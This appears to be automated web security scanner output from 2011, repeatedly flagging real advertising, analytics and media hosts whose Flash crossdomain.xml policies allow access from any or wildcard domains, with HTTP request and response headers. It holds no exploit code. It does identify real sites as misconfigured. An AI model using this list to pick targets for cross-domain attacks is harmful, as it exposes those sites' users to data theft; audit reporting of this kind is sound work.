GET /crossdomain.xml HTTP/1.1 Host: cdn.widgets.spongecell.com Proxy-Connection: keep-alive Referer: http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf?placementId=&flightId=&clickthroughUrl=http%3A%2F%2Fwww.officedepot.com%2F%3Fcm_mmc%3DRetail-_-Q1ITP2011%2BOwnerIQ-_-OwnerIQOwnerandIntenderGroup300x250-_-300x250&actionsType=Rectangle&backupImageUrl=http%3A%2F%2Fcdn.statics.live.spongecell.com%2Fofficedepot%2Fv4b%2Fassets%2F300x250.jpg&hostBaseUrl=spongecell.com&creativeSwfUrl=..%2Fassets%2F300x250.swf&subMenuType=Pop&menuType=Grid&height=250&widgetId=263365&trackImpressions=0&width=300&linkPrefixDecoded=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/g%3B234541768%3B0-0%3B0%3B58231430%3B4307-300/250%3B40051907/40069694/1%3Bu%3Dsid_%3B%7Eokv%3D%3Bpc%3DDFP235949442%3B%3B%7Efdr%3D235949442%3B0-0%3B0%3B41185174%3B4307-300/250%3B40069735/40087522/1%3Bu%3Dsid_%3B%7Esscs%3D%3f&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/g%3B234541768%3B0-0%3B0%3B58231430%3B4307-300/250%3B40051907/40069694/1%3Bu%3Dsid_%3B%7Eokv%3D%3Bpc%3DDFP235949442%3B%3B%7Efdr%3D235949442%3B0-0%3B0%3B41185174%3B4307-300/250%3B40069735/40087522/1%3Bu%3Dsid_%3B%7Esscs%3D%3fhttp%3A//www.officedepot.com/%3Fcm_mmc%3DRetail-_-Q1ITP2011+OwnerIQ-_-OwnerIQOwnerandIntenderGroup300x250-_-300x250&clickTag1=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/g%3B234541768%3B0-0%3B0%3B58231430%3B4307-300/250%3B40051907/40069694/1%3Bu%3Dsid_%3B%7Eokv%3D%3Bpc%3DDFP235949442%3B%3B%7Efdr%3D235949442%3B0-0%3B0%3B41185174%3B4307-300/250%3B40069735/40087522/1%3Bu%3Dsid_%3B%7Esscs%3D%3fhttp%3A//www.officedepot.com/promo/list5.do%3Flisttype%3DAY%3Fcm_mmc%3DRetail-_-Q1ITP2011+OwnerIQ-_-OwnerIQOwnerandIntenderGroup300x250-_-300x250&clickTag2=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/g%3B234541768%3B0-0%3B0%3B58231430%3B4307-300/250%3B40051907/40069694/1%3Bu%3Dsid_%3B%7Eokv%3D%3Bpc%3DDFP235949442%3B%3B%7Efdr%3D235949442%3B0-0%3B0%3B41185174%3B4307-300/250%3B40069735/40087522/1%3Bu%3Dsid_%3B%7Esscs%3D%3fhttp%3A//officedepot.shoplocal.com/officedepot%3Fcm_mmc%3DRetail-_-Q1ITP2011+OwnerIQ-_-OwnerIQOwnerandIntenderGroup300x250-_-300x250&clickTag3=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/g%3B234541768%3B0-0%3B0%3B58231430%3B4307-300/250%3B40051907/40069694/1%3Bu%3Dsid_%3B%7Eokv%3D%3Bpc%3DDFP235949442%3B%3B%7Efdr%3D235949442%3B0-0%3B0%3B41185174%3B4307-300/250%3B40069735/40087522/1%3Bu%3Dsid_%3B%7Esscs%3D%3fhttp%3A//cdn.statics.live.spongecell.com/officedepot/v4b/assets/Coupons1.pdf%3Fcm_mmc%3DRetail-_-Q1ITP2011+OwnerIQ-_-OwnerIQOwnerandIntenderGroup300x250-_-300x250& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: clk.redcated
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 207 Content-Type: text/xml Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT Accept-Ranges: bytes ETag: "488d2234387ec31:5e1" Connection: close Date: Sat, 05 Feb 2011 22:47:13 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: demos.us.intellitxt.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 02 Mar 2005 18:36:18 GMT Accept-Ranges: bytes ETag: "03debb8561fc51:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:47:43 GMT Connection: close Content-Length: 202
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ds.serving-sys.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT Server: Microsoft-IIS/6.0 Date: Sun, 06 Feb 2011 13:21:32 GMT Content-Length: 100 Connection: close Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: eisenstein.dk
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=NQJKKYS192.168.100.209CKOWJ; path=/ Date: Sun, 06 Feb 2011 17:52:46 GMT Server: Apache Last-Modified: Thu, 16 Oct 2008 18:44:17 GMT ETag: "c780a2-66-459633c692240" Accept-Ranges: bytes Content-Length: 102 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: enterprisemediagroup.112.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:21:53 GMT Server: Omniture DC/2.0.0 xserver: www92 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: external.ak.fbcdn.net
Response
HTTP/1.0 200 OK Server: Apache ETag: "a27e344a618640558cd334164e432db0:1247617934" Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT Accept-Ranges: bytes Content-Length: 258 Content-Type: application/xml Date: Sun, 06 Feb 2011 13:32:57 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: feeds.feedburner.com
Response
HTTP/1.0 200 OK Expires: Mon, 07 Feb 2011 13:39:12 GMT Date: Sun, 06 Feb 2011 13:39:12 GMT Cache-Control: public, max-age=86400 Content-Type: text/x-cross-domain-policy X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: files.video-loader.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "a004dc-245-4930aee4073c0" Accept-Ranges: bytes Content-Length: 581 Content-Type: text/xml Age: 73114 Date: Sat, 05 Feb 2011 23:07:33 GMT Last-Modified: Wed, 20 Oct 2010 11:44:23 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.video-loader.com --> <cross-domain-policy> <site-con ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: metrics.blackberry.com
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:32:28 GMT Server: Omniture DC/2.0.0 xserver: www276 Content-Length: 167 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: metrixlablw.customers.luna.net
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:21:20 GMT Server: Apache/2.2.14 (Ubuntu) Last-Modified: Wed, 18 Feb 2009 10:52:39 GMT ETag: "db020b-db-4632f37e1cbc0" Accept-Ranges: bytes Content-Length: 219 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: mittwiki.ivwbox.de
Response
HTTP/1.0 200 OK Server: srp/2ac Date: Sun, 06 Feb 2011 17:43:08 GMT Last-Modified: Tue, 22 Aug 2000 15:05:01 GMT P3P: policyref="http://www.ivwbox.de/p3p.xml", CP="NOI DSP PSAo OUR NOR UNI" Content-Length: 102 Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: platform.ak.fbcdn.net
Response
HTTP/1.0 200 OK Server: Apache ETag: "a27e344a618640558cd334164e432db0:1247617934" Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT Accept-Ranges: bytes Content-Length: 258 Content-Type: application/xml Date: Sun, 06 Feb 2011 13:32:57 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: rt32.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/xml;charset=UTF-8 Content-Length: 82 Date: Sat, 05 Feb 2011 22:15:46 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: rt82.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/xml;charset=UTF-8 Content-Length: 82 Date: Sat, 05 Feb 2011 22:15:09 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: rt83.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/xml;charset=UTF-8 Content-Length: 82 Date: Sat, 05 Feb 2011 22:15:00 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s.ytimg.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT Date: Sat, 05 Feb 2011 05:57:04 GMT Expires: Sat, 12 Feb 2011 05:57:04 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=604800 Age: 61319
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s3.amazonaws.com
Response
HTTP/1.1 200 OK x-amz-id-2: 76E6oj9w+b/hHPZf7UaEFSCi9AaQCW4UuWT+YKdmAw8EG3ShKK171g6nOB9vvB6N x-amz-request-id: 713BC53FB52939CB Date: Sat, 05 Feb 2011 22:59:10 GMT Content-Type: text/xml Connection: close Server: AmazonS3
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false" /></cross-domain-pol ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: spe.redcated
Response
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 207 Allow: GET Expires: Thu, 10 Feb 2011 19:43:50 GMT Date: Sun, 06 Feb 2011 13:22:29 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: spongecell.com
Response
HTTP/1.1 200 OK Server: nginx/0.6.35 Date: Sat, 05 Feb 2011 23:01:19 GMT Content-Type: text/xml Content-Length: 325 Last-Modified: Fri, 06 Aug 2010 01:11:11 GMT Connection: close Vary: Accept-Encoding Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: us.blackberry.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: videos.video-loader.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "a004dc-245-4930aee4073c0" Accept-Ranges: bytes Content-Length: 581 Content-Type: text/xml Age: 55705 Date: Sat, 05 Feb 2011 23:32:46 GMT Last-Modified: Wed, 20 Oct 2010 11:44:23 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.video-loader.com --> <cross-domain-policy> <site-con ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: vodpod.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sat, 05 Feb 2011 22:41:50 GMT Content-Type: text/xml Content-Length: 214 Last-Modified: Tue, 06 Oct 2009 19:34:48 GMT Connection: close Vary: Accept-Encoding P3P: policyref="http://facebook.vodpod.com/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Accept-Ranges: bytes
<?xml version="1.0"?> <!-- This file should be copied to the root of all web sites where you want to download/upload files.--> <cross-domain-policy> <allow-access-from domain="*" /> </cross-doma ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.ad4mat.de
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:39:38 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 Last-Modified: Wed, 15 Jul 2009 17:09:21 GMT ETag: "298327-13e-46ec19dbd1240" Accept-Ranges: bytes Content-Length: 318 Connection: close Content-Type: application/xml Set-Cookie: ad4mat_lb=616182620.20480.0000; path=/
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.allvoices.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:42:24 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Fri, 04 Feb 2011 19:44:52 GMT ETag: "20a8484-65-49b7a1d9d3500" Accept-Ranges: bytes Content-Length: 101 Vary: Accept-Encoding Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.au2m8.com
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=NQJKKYS192.168.100.218CKOWJ; path=/ Date: Sat, 05 Feb 2011 23:08:12 GMT Server: Apache Last-Modified: Wed, 03 Dec 2008 12:41:21 GMT ETag: "a80cf-66-45d23c2d7be40" Accept-Ranges: bytes Content-Length: 102 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.baselinemag.com
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Sat, 05 Feb 2011 23:01:28 GMT Content-Type: text/xml Connection: close Last-Modified: Tue, 30 Mar 2010 15:40:49 GMT ETag: "fe90c5-c5-48306742d2240" Accept-Ranges: bytes Content-Length: 197
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.hemidemi.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:16 GMT Server: Apache/2.2.6 (Unix) PHP/5.2.5 Last-Modified: Sun, 26 Oct 2008 14:31:52 GMT ETag: "c55f42-d0-e01c8600" Accept-Ranges: bytes Content-Length: 208 Vary: Accept-Encoding Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.manualsonline.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:39 GMT Server: Apache/2.2.14 (Fedora) Last-Modified: Wed, 26 Jan 2011 14:52:42 GMT ETag: "2e60d2-ef-49ac0fc2c4280" Accept-Ranges: bytes Content-Length: 239 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.zanox-affiliate.de
Response
HTTP/1.1 200 OK Content-Length: 330 Content-Type: text/xml Last-Modified: Thu, 17 Sep 2009 16:58:09 GMT Accept-Ranges: bytes ETag: "5ed8c08b837ca1:4a9" Server: Microsoft-IIS/6.0 P3P: policyref="http://www.zanox-affiliate.de/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 17:39:23 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www91.intel.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:36:49 GMT Server: Omniture DC/2.0.0 xserver: www419 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: yasnide.ivwbox.de
Response
HTTP/1.1 200 OK Server: s2.30.1 Date: Sun, 06 Feb 2011 18:25:56 GMT Last-Modified: Tue, 22 Aug 2000 15:05:01 GMT P3P: policyref=http://p3p.infonline.de/p3p.xml, CP=NOI DSP NID PSAa OUR NOR UNI COM NAV Content-Length: 102 Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ziffdavisbaseline.112.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:21:31 GMT Server: Omniture DC/2.0.0 xserver: www67 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.ligatus.com
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:44:12 GMT Server: Apache Last-Modified: Mon, 13 Sep 2010 13:56:24 GMT ETag: "4885ee-71-4902476407200" Accept-Ranges: bytes Content-Type: text/xml Cache-Control: private, max-age=600 Age: 0 Expires: Sun, 06 Feb 2011 17:54:12 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.ligatus.de
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:43:12 GMT Server: Apache Last-Modified: Mon, 13 Sep 2010 13:56:24 GMT ETag: "4885ee-71-4902476407200" Accept-Ranges: bytes Content-Type: text/xml Cache-Control: private, max-age=600 Age: 0 Expires: Sun, 06 Feb 2011 17:53:12 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.tweetmeme.com
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Sun, 06 Feb 2011 13:21:43 GMT Content-Type: text/xml; charset='utf-8' Connection: close P3P: CP="CAO PSA" Expires: Sun, 06 Feb 2011 13:26:43 +0000 GMT Etag: edc33ef1e6bd30dda068b8d6a45f5a7f X-Served-By: ded2062
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: appcdn.wibiya.com
Response
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=86400 Content-Type: application/xml Date: Sat, 05 Feb 2011 23:08:11 GMT ETag: "e08d12-142-496438084ba80" Expires: Sun, 06 Feb 2011 23:08:12 GMT Last-Modified: Tue, 30 Nov 2010 11:29:30 GMT Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.4 with Suhosin-Patch Content-Length: 322 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.static.ak.fbcdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-Cnection: close Date: Sat, 05 Feb 2011 22:44:06 GMT Content-Length: 1581 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: chitika.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:47:00 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.10 Last-Modified: Fri, 19 Jun 2009 18:59:40 GMT Accept-Ranges: bytes Content-Length: 161 Vary: Accept-Encoding Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: current.com
Response
HTTP/1.0 200 OK Last-Modified: Tue, 11 May 2010 19:15:29 GMT Accept-Ranges: bytes Content-Length: 676 Content-Type: text/xml Date: Sat, 05 Feb 2011 22:47:25 GMT Server: Apache Vary: Accept-Encoding X-Cache: HIT from current.com X-Cache-Lookup: HIT from current.com:3128 Via: 1.0 current.com:3128 (squid) Connection: close Keep-Alive: timeout=30, max=100
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: d.ligatus.com
Response
HTTP/1.1 200 OK Accept-Ranges: bytes ETag: W/"315-1288858532000" Last-Modified: Thu, 04 Nov 2010 08:15:32 GMT Content-Type: application/xml Content-Length: 315 Date: Sun, 06 Feb 2011 17:44:28 GMT Connection: close Server: Apache
